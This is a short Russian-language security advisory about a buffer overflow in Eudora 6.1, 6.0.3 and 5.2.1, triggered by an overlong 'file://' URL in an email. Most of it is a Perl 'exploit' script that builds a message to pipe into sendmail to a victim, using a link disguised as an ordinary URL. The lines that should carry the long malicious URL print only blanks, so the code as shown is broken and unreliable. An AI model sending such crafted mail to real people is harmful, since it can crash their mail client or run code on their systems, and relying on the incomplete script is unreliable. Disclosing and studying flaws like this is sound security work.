Программа: Eudora 6.1, 6.0.3 и 5.2.1 

Переполнение буфера обнаружено в Eudora в 'file://' URL. Удаленный пользователь может выполнить произвольный код на уязвимой системе.
Удаленный пользователь может послать email сообщение, содержащее специально обработанный 'file://' URL, длиннее 300 символов, чтобы вызвать переполнение буфера и выполнить произвольный код на уязвимой системе. 

Эксплоит: 

#!/usr/bin/perl --
print "From: me\n";
print "To: you\n";
print "Subject: Eudora file URL buffer overflow demo\n";
print "X-Use: Pipe the output of this script into: sendmail -i
victim\n\n";
print "The following is a \"proper\" HTML URL, pointing to somewhere
long:\n";
print " \n";
print " \n";
print "Fake URL to http://anywhere/I/want \n";
print " \n";
print "Clicking above will crash Eudora.\n\n";
print "The following plain-text converted by Eudora into a clickable
URL\n";
print "http://www.maths.usyd.edu.au:8000/u/psz/securepc.html#Eudoraxx\n";
print "is for comparison: the user can hardly tell them apart.\n\n";

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии